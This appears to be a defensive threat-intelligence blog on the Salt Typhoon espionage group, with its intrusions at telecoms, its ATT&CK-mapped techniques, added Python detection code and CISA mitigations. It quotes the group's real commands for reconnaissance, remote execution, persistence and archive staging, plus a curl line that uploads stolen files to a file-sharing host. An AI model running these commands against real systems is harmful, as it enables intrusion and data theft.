Salt Typhoon, also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is a critical actor in the global cyber threat landscape. Renowned for its sophisticated cyber espionage campaigns, the group primarily targets the telecommunications, government, and technology sectors. Strongly linked to state-sponsored initiatives, particularly from China [1], Salt Typhoon’s operations go beyond intelligence gathering. By targeting critical infrastructure and key industries, the group advances geopolitical objectives, exerting strategic pressure on adversaries. This dual role of espionage and influence underscores its pivotal role in shaping international relations through digital means.
Among Salt Typhoon’s arsenal is the advanced "GhostSpider" backdoor malware, specifically engineered to infiltrate telecommunications networks [2]. This tool provides persistent access to compromised systems, enabling prolonged surveillance and data extraction. Such capabilities highlight not only the group's technical sophistication but also the potential risk it poses to global critical infrastructure.
In this blog, we’ll analyze Salt Typhoon’s tactics, techniques, and procedures (TTPs), explore its targeted industries, and examine the tools it employs. Through specific case studies and insights from cutting-edge cybersecurity research, we aim to empower defenders with actionable strategies to mitigate the threats posed by this advanced and persistent adversary.
Salt Typhoon is a prominent threat actor that has garnered significant attention in the cybersecurity community due to its sophisticated operations and strategic targeting. This group, which is believed to be state-sponsored by China, has been active since at least 2023, according to [3].
Salt Typhoon's operations are marked by the use of advanced malware and the exploitation of both known and zero-day vulnerabilities, showcasing the resources and expertise typically associated with nation-state actors. This group has demonstrated a consistent ability to exploit public-facing endpoints, targeting vulnerabilities that allow for initial access and long-term persistence.
Notably, the following CVEs have been exploited by Salt Typhoon in their campaigns:
In addition, the group's affiliation with China is further supported by the use of tools and techniques consistent with other known Chinese APT groups [4].
Since its inception, Salt Typhoon has demonstrated an evolution in both its technical capabilities and its targeting strategies [5]. Initially, the group focused on exploiting vulnerabilities in widely used software and systems to gain access to sensitive networks.
In recent years, Salt Typhoon has enhanced its arsenal with custom-developed malware, most notably the "GhostSpider" backdoor. This advanced tool enables persistent access to compromised systems, supporting long-term espionage operations targeting telecommunications networks worldwide, as detailed in [6]. The group's targeting has also evolved, with a notable shift towards more strategic targets that can yield high-value intelligence. This includes not only telecommunications but also government entities and technology firms, which are often at the forefront of innovation and possess critical data.
Salt Typhoon, a sophisticated threat actor, has been linked to several high-profile cyber incidents that have significantly impacted various sectors globally. This section provides some of the most notable attacks attributed to Salt Typhoon, highlighting their objectives, methodologies, and the resulting impacts.
In 2024, the Chinese state-sponsored hacking group Salt Typhoon launched a global campaign targeting telecommunications service providers. Utilizing their custom-developed backdoor malware, GhostSpider, the group gained persistent access to compromised systems, enabling prolonged espionage activities within critical telecommunications networks.
Notably, Salt Typhoon breached major U.S. broadband providers [7], including Verizon, AT&T, and Lumen Technologies, potentially exposing sensitive communications data, such as information from federal wiretapping systems [8], and posing significant national security risks to government and corporate activities.
Their attack methods include exploiting vulnerabilities in public-facing endpoints such as VPNs, firewalls, and Exchange servers to gain initial access [9]. They have also been observed using spear-phishing emails to deliver malware payloads. Once inside the network, they establish persistence using tools like the Demodex rootkit and the GhostSpider backdoor, which can load different modules depending on the attackers' objectives.
Their operations are characterized by stealth and persistence, often remaining undetected for extended periods. The breaches resulted in significant data exposure, with potential implications for national security and corporate confidentiality.
In 2024, T-Mobile was among several major U.S. telecommunications providers targeted by a sophisticated cyber-espionage campaign attributed to the Chinese state-sponsored group known as Salt Typhoon [10].
The attackers exploited vulnerabilities in network infrastructure, particularly focusing on routers and switches, to gain unauthorized access [11]. Their objectives included intercepting private communications, accessing call records, and obtaining sensitive data related to law enforcement requests.
T-Mobile acknowledged detecting and mitigating these intrusion attempts, emphasizing that no significant customer data was compromised [12]. The company stated that its security measures effectively prevented the attackers from achieving their goals.
This incident underscores the persistent and evolving nature of cyber threats facing the telecommunications industry, highlighting the critical importance of robust security measures to protect network infrastructure and sensitive information.
Salt Typhoon, a sophisticated threat actor, employs a range of tactics, techniques, and procedures (TTPs) that are mapped to the MITRE ATT&CK framework. This section provides a detailed analysis of these TTPs, offering insights into how Salt Typhoon executes its operations.
Each tactic is examined with its associated techniques, providing a comprehensive understanding of the threat actor's methodologies.
As mentioned earlier, initial access is primarily achieved by exploiting vulnerabilities in exposed public-facing endpoints, enabling the deployment of malicious payloads through known flaws in web servers and applications.
Here are some of the known vulnerabilities, with CVE IDs, that Salt Typhoon is known to have exploited [6]:
Note that patches are already available for these vulnerabilities, some of which date back to 2021. This highlights the importance of timely remediation as part of an exposure management process.
Salt Typhoon uses command and scripting interpreters to execute malicious scripts and commands on compromised systems. This technique is crucial for deploying additional payloads and maintaining control over infected hosts.
For instance, security researchers have identified a case where the group exploited vulnerable or misconfigured QConvergeConsole installations on a target server to gain system access [5]. The remote application agent installed on the server (located at c:\program files\qlogic corporation\nqagent\netqlremote.exe) was used for network discovery and to deploy Cobalt Strike on the compromised machine.
The following commands were written and executed by Salt Typhoon.
# Retrieves domain admin group details:
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
# Copies malicious payload to the target:
# Extracts the payload on the target:
C:\Windows\system32\cmd.exe /C expand -f:* \\{HostName}\c$\programdata\microsoft\drm\go4.cab \\{HostName}\c$\programdata\microsoft\drm
# Execute malicious script remotely:
In a separate case, the group exploited a vulnerability in Apache Tomcat 6, included with QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe), to facilitate lateral movement and execute later-stage tools [5].
# Executes a batch script (182.bat) on a remote system using WMIC:
C:\Windows\system32\cmd.exe /C wmic /node:172.16.xx.xx process call create "cmd.exe /c c:\ProgramData\Microsoft\DRM\182.bat"
# Employs rar.exe to compress sensitive files, specifically PDFs, into an archive. By collecting files from the temp directory and compressing them into a single .rar archive with maximum compression, Salt Typhoon staged the data for exfiltration:
C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf
These actions demonstrate a structured approach to lateral movement and data staging, critical steps in their attack chain.
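The commands above are individually unremarkable (net, expand, wmic and an archiver are all legitimate tools), which is why detection works best as a set of rules over process-creation telemetry with the fired rules grouped per account. The following Python is an added example, not code from the blog or from Trend Micro: it defines rules for the domain-admin enumeration, the cab extraction through an admin share, the WMIC remote process creation (the same pattern as the remote schtasks invocation shown later under privilege escalation), and the rar staging, then runs them over constructed Sysmon-style events. The host name SRV01, the address 172.16.10.25 and the user names are invented for the example.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# SRV01, 172.16.10.25 and the user names are invented; the command lines
# mirror the ones quoted in the blog.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net group "domain admins" /domain',
     "User": "CORP\\svc_backup"},
    {"id": 2, "Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": r"expand -f:* \\SRV01\c$\programdata\microsoft\drm\go4.cab \\SRV01\c$\programdata\microsoft\drm",
     "User": "CORP\\svc_backup"},
    {"id": 3, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:172.16.10.25 process call create "cmd.exe /c c:\ProgramData\Microsoft\DRM\182.bat"',
     "User": "CORP\\svc_backup"},
    {"id": 4, "Image": r"C:\Users\Public\Music\rar.exe",
     "CommandLine": r"C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf",
     "User": "CORP\\svc_backup"},
    # benign activity that must not trigger anything
    {"id": 5, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use Z: \\fileserver\share",
     "User": "CORP\\alice"},
]

# Directories any user can write to; an archiver running from one of them is
# far more suspicious than the same tool installed under Program Files.
WRITABLE_DIRS = ("\\users\\public\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
ARCHIVERS = ("rar.exe", "winrar.exe", "7z.exe")

# Each rule: (name, ATT&CK tactic, predicate over the normalised event).
RULES = [
    ("domain_admin_enumeration", "discovery",
     lambda e: e["image"].endswith(("\\net.exe", "\\net1.exe"))
     and re.search(r'group\s+"?domain admins"?\s+/domain', e["cmd"]) is not None),
    ("cab_expand_via_admin_share", "lateral tool transfer",
     lambda e: e["image"].endswith("\\expand.exe")
     and re.search(r"\\\\[^\\]+\\c\$\\", e["cmd"]) is not None
     and "\\programdata\\" in e["cmd"]),
    ("wmic_remote_process_create", "execution",
     lambda e: e["image"].endswith("\\wmic.exe")
     and "/node:" in e["cmd"]
     and re.search(r"process\s+call\s+create", e["cmd"]) is not None),
    ("archiver_in_writable_path", "collection",
     lambda e: e["image"].endswith(ARCHIVERS)
     and any(d in e["image"] for d in WRITABLE_DIRS)),
    ("document_archiving_for_staging", "collection",
     lambda e: e["image"].endswith(ARCHIVERS)
     and re.search(r"\s+a\s+", e["cmd"]) is not None
     and (re.search(r"-m[3-5]\b", e["cmd"]) is not None
          or "-hp" in e["cmd"] or "*.pdf" in e["cmd"])),
]


def normalise(event):
    """Lower-case the fields the rules match on so case tricks do not matter."""
    return {"id": event["id"], "image": event["Image"].lower(),
            "cmd": event["CommandLine"].lower(), "user": event["User"]}


def evaluate(events):
    """Return (event id, rule name) for every rule that fires."""
    hits = []
    for ev in events:
        n = normalise(ev)
        for name, _tactic, pred in RULES:
            if pred(n):
                hits.append((ev["id"], name))
    return hits


def tactics_per_user(events):
    """Group the fired tactics by account: one user walking through discovery,
    tool transfer, execution and collection stands out even when each single
    command could pass for routine administration."""
    tactic_of = {name: tactic for name, tactic, _ in RULES}
    seen = {}
    for ev in events:
        for _ev_id, name in evaluate([ev]):
            seen.setdefault(ev["User"], set()).add(tactic_of[name])
    return {user: sorted(t) for user, t in seen.items()}


if __name__ == "__main__":
    for ev_id, name in evaluate(SAMPLE_EVENTS):
        print(f"event {ev_id}: {name}")
    print(tactics_per_user(SAMPLE_EVENTS))
```

The rules deliberately key on the combination of binary and arguments (expand reading a .cab through `\\host\c$\`, rar invoked with a high compression level or `-hp` against document globs) rather than on the file names, which the group changes between intrusions.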
Here are the persistence techniques used by Salt Typhoon.
To maintain persistence, Salt Typhoon modifies system processes or creates new ones that run malicious code. This ensures that their malware remains active even after system reboots.
For instance, Crowdoor backdoor malware used by Salt Typhoon establishes persistence through a combination of registry modifications and service creation. When no argument or argument "0" is passed during execution, Crowdoor adds an entry to the Windows registry Run key using commands like [5]:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v malicious-registry-name /t REG_SZ /d "C:\path\to\malicious-crowdoor.exe" /f
Alternatively, it can create a new service with commands such as:
sc create Crowdoor binPath= "C:\path\to\malicious-crowdoor.exe" start= auto
Both methods ensure the backdoor is executed automatically on system reboot.
For stealth, Crowdoor employs process injection to execute itself within the context of a legitimate process, such as msiexec.exe. When argument "1" is used, the malware invokes process injection, leveraging Windows API functions such as CreateRemoteThread or NtCreateThreadEx to inject malicious payloads into the memory space of msiexec.exe. This enables execution without leaving significant artifacts on disk.
Crowdoor's main functions are controlled by additional arguments passed during execution [5]. For instance:
These techniques, combined with its ability to dynamically switch between different operational modes based on provided arguments, make Crowdoor a robust persistence tool.
For privilege escalation, Salt Typhoon utilizes a range of sophisticated methods to gain elevated access within compromised systems. Key tactics include [5]:
The group exploits vulnerabilities in external-facing services like Microsoft Exchange servers and QConvergeConsole installations. Exploited services are used to deploy tools such as Cobalt Strike and PsExec, providing initial access to high-privilege accounts or systems.
(For command examples, see the “Command and Scripting Interpreter” section of the blog).
Tools like TrillClient are employed to harvest sensitive credentials from browser caches and other storage areas. Extracted credentials are often used to impersonate privileged users, such as domain admins, facilitating further escalation.
The attackers use commands to create malicious services that execute payloads with elevated privileges. For example:
sc create VGAuthtools binpath= "Installutil[.]exe C:\ProgramData\VMware\vmvssrv.exe" start= auto
This command launches a malicious loader that deploys high-privilege tools such as Cobalt Strike.
Salt Typhoon created scheduled tasks remotely, using tools like WMIC, to execute commands or payloads with system-level privileges.
For instance, they used the following command:
wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"
It connects to a remote machine (/node:<IP>) using the specified credentials (/user and /password) and spawns a process there that invokes schtasks on the scheduled task named microsoft\sihost. This task is configured to execute with system-level privileges, allowing the attackers to run malicious payloads or commands seamlessly. By leveraging WMIC and scheduled tasks, Salt Typhoon could integrate malicious activities into routine system processes, making detection and analysis more challenging.
The Salt Typhoon threat group employed several sophisticated defense evasion techniques during its campaigns [5]:
They utilized DLL sideloading by exploiting legitimate processes like MsSecEs.exe to load malicious DLLs such as Zingdoor and Snappybee. This allowed them to evade detection by blending into normal system operations.
In addition, they implemented other alternative ways to load payloads, such as:
C:\Windows\system32\cmd.exe /C sc create VMware binpath= "rundll32.exe C:\Progra~1\VMware\vmtools.dll,fjdpw03d" start= auto displayname= "VMware"
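The three service definitions quoted in this post (Crowdoor's `sc create`, the VGAuthtools service hosted by InstallUtil, and the VMware-named service that runs rundll32 through an 8.3 short path) share traits a defender can check for mechanically when reviewing new services: the service's real code lives in a DLL or assembly handed to a Windows proxy binary, the payload sits in a user-writable directory, the path is obscured with a short name, and the display name borrows a vendor's name while the binary is nowhere near that vendor's install directory. The following Python is an added example, not the blog's or Trend Micro's code: it parses `sc create` command lines (the same checks apply to ImagePath values read from the Services registry key) and scores each one. The defanged "Installutil[.]exe" is written plainly, the rundll32 export-name heuristic is my own assumption, and the VMTools service is a constructed benign case for comparison.

```python
import re

# Windows binaries routinely used to host somebody else's code inside a
# service (rundll32 loads a DLL, InstallUtil runs an assembly, and so on).
PROXY_HOSTS = {"rundll32.exe", "regsvr32.exe", "installutil.exe", "mshta.exe",
               "msiexec.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
WRITABLE_DIRS = ("\\programdata\\", "\\users\\public\\", "\\temp\\", "\\appdata\\")
VENDOR_WORDS = ("vmware", "microsoft", "intel", "nvidia", "adobe")

# Two commands adapted from the ones quoted in the blog (defanging removed)
# plus one constructed benign service for comparison.
SAMPLE_COMMANDS = [
    r'sc create VGAuthtools binpath= "Installutil.exe C:\ProgramData\VMware\vmvssrv.exe" start= auto',
    r'C:\Windows\system32\cmd.exe /C sc create VMware binpath= "rundll32.exe C:\Progra~1\VMware\vmtools.dll,fjdpw03d" start= auto displayname= "VMware"',
    r'sc create VMTools binpath= "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" start= auto displayname= "VMware Tools"',
]


def parse_sc_create(cmd):
    """Parse 'sc create <name> key= value ...' (sc requires the space after '=')."""
    m = re.search(r"\bsc(?:\.exe)?\s+create\s+(\S+)\s+(.*)", cmd, re.IGNORECASE)
    if not m:
        return None
    svc = {"name": m.group(1)}
    for key, quoted, bare in re.findall(r'(\w+)=\s*(?:"([^"]*)"|(\S+))', m.group(2)):
        svc[key.lower()] = quoted if quoted else bare
    return svc


def host_binary(binpath):
    """First executable in a service image path, honouring quotes and spaces."""
    s = binpath.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    m = re.match(r"(.*?\.exe)(?=\s|$)", s, re.IGNORECASE)
    return m.group(1) if m else s.split()[0]


def assess_service(svc):
    """Return 'category: detail' findings for one parsed service definition."""
    findings = []
    low = svc.get("binpath", "").lower()
    host = host_binary(low).rsplit("\\", 1)[-1]
    if host in PROXY_HOSTS:
        findings.append(f"proxy-host: service code is hosted by {host}")
    for d in WRITABLE_DIRS:
        if d in low:
            findings.append(f"writable-path: image path contains {d}")
            break
    if "~" in low:
        findings.append("short-path: 8.3 short name hides the real directory")
    # Heuristic (an assumption of this example): a rundll32 entry point with no
    # vowels looks generated rather than like a documented export name.
    export = re.search(r"\.dll,\s*(\w+)", low)
    if host == "rundll32.exe" and export and not re.search(r"[aeiou]", export.group(1)):
        findings.append(f"odd-export: rundll32 entry point '{export.group(1)}' looks machine-generated")
    display = svc.get("displayname", "").lower()
    if any(v in display for v in VENDOR_WORDS) and "\\program files" not in low:
        findings.append("vendor-mismatch: vendor-style display name but binary outside Program Files")
    return findings


def audit(commands):
    """Parse every sc create command and return [(service name, findings)]."""
    out = []
    for cmd in commands:
        svc = parse_sc_create(cmd)
        if svc:
            out.append((svc["name"], assess_service(svc)))
    return out


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_COMMANDS):
        print(name, findings or "no findings")
```

Run against a baseline export of services (or the Run keys, which need only a different parser), anything with two or more findings is worth a look before its display name convinces an analyst it belongs to a vendor.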
They used various encryption methods, including multi-layer XOR and Base64 encoding with custom alphabets, to hide the malicious payloads in tools like Cobalt Strike. This made static analysis by defenders more challenging.
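Custom-alphabet Base64 defeats tools that only look for standard Base64, and stacked XOR layers defeat single-key brute forcing, but both are reversible once the alphabet and keys are lifted from the loader. The following Python is an added example, not code from the blog or from any Salt Typhoon tool: it shows how a custom alphabet is undone with a translation table, how layered XOR keys are peeled in reverse order, and how a single XOR layer's key can be recovered from a known plaintext prefix such as the MZ header of a PE file. The alphabet, keys and plaintext are constructed for the example.

```python
import base64
import itertools

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed sample: a rotated alphabet and two XOR keys. For a real sample
# these would be recovered from the loader that decodes the payload.
SAMPLE_ALPHABET = STD_ALPHABET[17:] + STD_ALPHABET[:17]
SAMPLE_KEYS = [b"\x5a", b"s4lt"]
SAMPLE_PLAINTEXT = b"MZ\x90\x00constructed stand-in for an encoded payload"


def xor_bytes(data, key):
    """XOR data against a repeating key (a single-byte key is the special case)."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def custom_b64decode(text, alphabet):
    """Decode Base64 written with a non-standard 64-character alphabet by
    translating it back to the standard alphabet; '=' padding is left alone."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    return base64.b64decode(text.translate(str.maketrans(alphabet, STD_ALPHABET)))


def custom_b64encode(raw, alphabet):
    """Inverse of custom_b64decode; used here only to build the sample."""
    return base64.b64encode(raw).decode("ascii").translate(str.maketrans(STD_ALPHABET, alphabet))


def wrap(raw, alphabet, keys):
    """Apply the layers in order: XOR with each key, then custom Base64."""
    for key in keys:
        raw = xor_bytes(raw, key)
    return custom_b64encode(raw, alphabet)


def unwrap(blob, alphabet, keys):
    """Peel the layers in reverse: custom Base64 first, then XOR keys last-applied first."""
    data = custom_b64decode(blob, alphabet)
    for key in reversed(keys):
        data = xor_bytes(data, key)
    return data


def recover_xor_key(layer, known_prefix, key_len):
    """Known-plaintext recovery of one XOR layer: when the decoded data must
    start with known bytes (e.g. b'MZ\\x90\\x00') and the key is no longer than
    that prefix, key[i] = layer[i] ^ known[i]. Returns None if the prefix is too short."""
    if len(known_prefix) < key_len:
        return None
    return bytes(layer[i] ^ known_prefix[i] for i in range(key_len))


if __name__ == "__main__":
    blob = wrap(SAMPLE_PLAINTEXT, SAMPLE_ALPHABET, SAMPLE_KEYS)
    print(blob)
    print(unwrap(blob, SAMPLE_ALPHABET, SAMPLE_KEYS))
    print(recover_xor_key(xor_bytes(SAMPLE_PLAINTEXT, b"s4lt"), b"MZ\x90\x00", 4))
```

The translation-table trick is what makes custom alphabets cheap to handle at scale: a detection or sandbox pipeline can try every alphabet it has seen in earlier samples against a suspicious string without writing a new decoder each time.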
Earth Estries (a.k.a. Salt Typhoon) employs a sophisticated tactic of obfuscating files and removing indicators by frequently uninstalling older backdoor versions and replacing them with updated variants. This strategy falls under Indicator Removal from Tools, which aims to minimize the likelihood of detection and forensic analysis.
For example, tools such as Crowdoor and Cobalt Strike are periodically cleaned up and replaced, either through automated scripts or manual intervention.
By cycling through updated versions, Earth Estries reduces the digital footprint of its operations while adapting to changes in the target's defensive measures. This technique also helps the group evade behavioral detection systems that may rely on recognizing specific patterns or artifacts left by earlier tools. Through this method, Earth Estries maintains operational security and persistence, making it harder for defenders to attribute and neutralize their activities.
The threat actor uses remote services to move laterally within a network. By leveraging valid account credentials that they harvested during their presence within the compromised network, Salt Typhoon can access remote systems and spread their malware across the network, increasing their foothold and potential impact [13].
Salt Typhoon employed a new variant of the NinjaCopy tool to bypass security mechanisms and extract sensitive system files. NinjaCopy uses a low-level NTFS parser, bypassing Windows protections like the System Access Control List (SACL) and Discretionary Access Control Lists (DACLs), enabling the group to extract files such as the NTDS.dit and SYSTEM registry hives. These files contain critical data like hashed credentials, which are vital for further exploitation within the victim's environment.
This modified variant of NinjaCopy, based on an open-source NTFS parser by Velocidex, allows attackers to open read handles on protected NTFS volumes, enabling unauthorized access to files locked by the system or used exclusively by other processes. By targeting these files, Earth Estries extracted sensitive configuration and credential data from their victims.
The group organized their collected data into password-protected RAR archives before exfiltration. They used the following command to archive and secure sensitive files [5]:
rar a -m3 -inul -ed -r -s -hp{password} -ta{yyyymmdd} -n*.pdf -n*.ddf -x*"\{avoided path}\" {Collector Path}\out<n>.tmp \\{IP}\"{Target Path}"
Salt Typhoon employed predefined passwords like:
takehaya
These archives often contained documents, system logs, and sensitive browser data collected from user directories.
After data collection, Earth Estries exfiltrated the stolen archives via command-and-control (C2) channels, using tools like cURL to upload files to anonymized file-sharing services.
Commands for exfiltration included:
curl -F "file=@c:\windows\ime\out1.tmp" hxxps://api.anonfiles[.]com/upload
These actions anonymized their operations, making detection and traceability challenging for defenders. Additionally, Earth Estries leveraged internal proxy servers to disguise outbound traffic, forwarding data from compromised machines to external C2 servers. This tactic ensured exfiltration efforts appeared as routine network activity within the victim's environment.
Salt Typhoon utilized advanced command-and-control techniques to obfuscate malicious activity. Notably, their backdoors, such as Zingdoor, were configured to route communication through internal proxy servers within the victim’s network. This method masked malicious traffic by blending it with legitimate internal communication, making detection significantly more challenging.
By leveraging the internal proxy infrastructure, Salt Typhoon redirected backdoor traffic to external command-and-control (C2) servers through multiple proxy layers. This approach not only concealed the true destination of the data but also reduced the likelihood of detection by anomaly-based monitoring systems or intrusion detection tools. Consequently, the attackers effectively evaded network security controls and prolonged their presence within the compromised environment.
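An internal host used as a relay for exfiltration or C2 leaves a traffic shape that a sanctioned proxy does not: several internal peers push data into it, it forwards roughly the same volume, and it forwards to one or two external addresses rather than fanning out to the whole web. The following Python is an added example, not code from the blog or from any vendor: it applies that fan-in / fan-out / byte-balance test to flow records (NetFlow-style tuples) and shows how a corporate proxy is excluded either by its fan-out or by an allowlist. All addresses are constructed; 203.0.113.77 and 198.51.100.x are documentation ranges.

```python
import ipaddress
from collections import defaultdict

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


# Constructed flow records: (source IP, destination IP, destination port, bytes sent).
SAMPLE_FLOWS = [
    # four workstations push data to an internal host on an unusual port ...
    ("10.1.5.11", "10.1.9.40", 8443, 350_000),
    ("10.1.5.12", "10.1.9.40", 8443, 420_000),
    ("10.1.7.3", "10.1.9.40", 8443, 180_000),
    ("10.1.2.21", "10.1.9.40", 8443, 260_000),
    # ... and that host pushes roughly the same volume to a single external address
    ("10.1.9.40", "203.0.113.77", 443, 1_190_000),
    # ordinary traffic: the corporate web proxy fans out to many external sites,
    # and a file server receives data but never talks outbound
    ("10.1.5.11", "10.1.0.5", 8080, 50_000),
    ("10.1.5.12", "10.1.0.5", 8080, 70_000),
    ("10.1.7.3", "10.1.0.5", 8080, 40_000),
    ("10.1.0.5", "198.51.100.10", 443, 30_000),
    ("10.1.0.5", "198.51.100.11", 443, 60_000),
    ("10.1.0.5", "198.51.100.12", 443, 40_000),
    ("10.1.5.11", "10.1.0.9", 445, 900_000),
]


def find_relay_candidates(flows, min_fanin=3, max_fanout=2, tolerance=0.3, allowlist=()):
    """Internal hosts that (a) receive data from at least min_fanin internal peers,
    (b) send to no more than max_fanout external addresses, and (c) forward a byte
    volume within `tolerance` of what they received. A sanctioned proxy normally
    fails (b); a file server fails (c) because it sends nothing out."""
    in_peers, out_peers = defaultdict(set), defaultdict(set)
    in_bytes, out_bytes = defaultdict(int), defaultdict(int)
    for src, dst, _port, nbytes in flows:
        if is_internal(src) and is_internal(dst):
            in_peers[dst].add(src)
            in_bytes[dst] += nbytes
        elif is_internal(src) and not is_internal(dst):
            out_peers[src].add(dst)
            out_bytes[src] += nbytes
    candidates = []
    for host, peers in in_peers.items():
        if host in allowlist or len(peers) < min_fanin:
            continue
        if not out_peers[host] or len(out_peers[host]) > max_fanout:
            continue
        ratio = out_bytes[host] / in_bytes[host]
        if abs(ratio - 1.0) <= tolerance:
            candidates.append({"host": host, "fan_in": len(peers),
                               "external_peers": sorted(out_peers[host]),
                               "bytes_in": in_bytes[host], "bytes_out": out_bytes[host]})
    return sorted(candidates, key=lambda c: c["fan_in"], reverse=True)


if __name__ == "__main__":
    for c in find_relay_candidates(SAMPLE_FLOWS):
        print(c)
```

The thresholds are where tuning happens: raising `max_fanout` makes the real proxy match on byte balance alone, which is why known proxies and gateways belong in the allowlist rather than being excluded by a threshold that an attacker can also slip under by adding a second C2 address.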
CISA, in collaboration with the FBI and the NSA, has issued guidance to mitigate cyber threats posed by Salt Typhoon, a state-sponsored actor affiliated with the People's Republic of China.
Key recommendations include:
Implement Out-of-Band Management: Utilize a physically separate management network to prevent unauthorized access and lateral movement within operational networks.
Strict Access Control Lists (ACLs): Adopt a default-deny ACL strategy to regulate inbound and outbound traffic, ensuring all denied traffic is logged for analysis.
Employ Strong Network Segmentation: Use router ACLs, stateful packet inspection, firewalls, and demilitarized zones (DMZs) to isolate different device groups and services, reducing the attack surface.
Isolate Externally Facing Services: Place services like DNS, web servers, and mail servers in a DMZ to separate them from internal networks and backend resources.
Apply Patches for Internet-Facing Systems: Prioritize updating critical vulnerabilities, especially in appliances frequently targeted by threat actors.
Plan for Technology Lifecycle: Establish end-of-life plans for technologies beyond the manufacturer's supported lifecycle to ensure systems remain secure.
Implement Phishing-Resistant MFA: Deploy MFA solutions that are resistant to phishing attacks to enhance account security and prevent unauthorized access.
Enable Comprehensive Logging: Ensure logging is active for application, access, and security events, and store logs centrally to facilitate monitoring and incident response.
Incorporate Security in Development: Encourage software manufacturers to embed security throughout the development lifecycle to strengthen the overall security posture of their products.
By implementing these strategies, organizations can bolster their defenses against sophisticated cyber threats like Salt Typhoon, safeguarding critical infrastructure and sensitive information.
Salt Typhoon serves as a stark reminder of the transformative nature of cyber warfare and the strategic imperatives it creates for both governments and industries. Its ability to exploit vulnerabilities, deploy advanced malware, and persist undetected in critical infrastructure highlights the widening asymmetry between attackers and defenders. As geopolitical rivalries increasingly manifest in cyberspace, organizations must recognize that cyber threats are not isolated incidents but components of broader strategic objectives. Addressing this challenge demands a paradigm shift—one that prioritizes continuous risk assessment, adaptive defense mechanisms, and coordinated responses across public and private sectors.
To outpace adversaries like Salt Typhoon, defenders must embrace a proactive and strategic posture. This includes prioritizing zero-trust architecture, embedding security into the technology lifecycle, and fostering real-time threat intelligence sharing. Governments and enterprises alike must transition from reactive to predictive models of cybersecurity, aligning resources to counter state-sponsored actors’ evolving tactics. By investing in resilience and innovation, the global community can not only neutralize immediate threats but also reinforce the security of critical systems, ensuring a robust defense against the sophisticated adversaries shaping the digital battleground.
[1] R. Forno, “Salt Typhoon: China’s Attack on US Telecommunications Networks,” The Diplomat, Dec. 11, 2024. Available: https://thediplomat.com/2024/12/salt-typhoon-chinas-attack-on-us-telecommunications-networks/. [Accessed: Dec. 18, 2024]
[2] “Salt Typhoon Builds Out Malware Arsenal With GhostSpider,” Nov. 26, 2024. Available: https://www.darkreading.com/application-security/salt-typhoon-malware-arsenal-ghostspider. [Accessed: Dec. 18, 2024]
[3] “Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions,” Trend Micro, Nov. 25, 2024. Available: https://www.trendmicro.com/en_nl/research/24/k/earth-estries.html. [Accessed: Dec. 18, 2024]
[4] G. Baran, “Chinese APT Hackers Using Multiple Tools And Vulnerabilities To Attack Telecom Orgs,” Cyber Security News, Nov. 27, 2024. Available: https://cybersecuritynews.com/chinese-apt-attacking-telecoms/. [Accessed: Dec. 18, 2024]
[5] “Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations,” Trend Micro, Nov. 08, 2024. Available: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html. [Accessed: Dec. 19, 2024]
[6] B. Toulas, “Salt Typhoon hackers backdoor telcos with new GhostSpider malware,” BleepingComputer, Nov. 25, 2024. Available: https://www.bleepingcomputer.com/news/security/salt-typhoon-hackers-backdoor-telcos-with-new-ghostspider-malware/. [Accessed: Dec. 19, 2024]
[7] J. Lyons, “Chinese cyberspies reportedly breached Verizon, AT&T, Lumen,” The Register, Oct. 07, 2024. Available: https://www.theregister.com/2024/10/07/verizon_att_lumen_salt_typhoon/. [Accessed: Dec. 19, 2024]
[8] “U.S. Wiretap Systems Targeted in China-Linked Hack,” The Wall Street Journal. Available: https://www.wsj.com/tech/cybersecurity/u-s-wiretap-systems-targeted-in-china-linked-hack-327fc63b
[9] “Salt Typhoon unleashes ‘GhostSpider’ on telecoms,” Nov. 26, 2024. Available: https://fieldeffect.com/blog/salt-typhoon-unleashes-ghostspider-on-telecoms. [Accessed: Dec. 19, 2024]
[10] S. Wheelston, “Chinese hacking group targets telecom networks,” DMNews, Dec. 05, 2024. Available: https://www.dmnews.com/chinese-hacking-group-targets-telecom-networks/. [Accessed: Dec. 19, 2024]
[11] S. Gatlan, “Chinese hackers breached T-Mobile’s routers to scope out network,” BleepingComputer, Nov. 27, 2024. Available: https://www.bleepingcomputer.com/news/security/chinese-hackers-breached-t-mobiles-routers-to-scope-out-network/. [Accessed: Dec. 19, 2024]
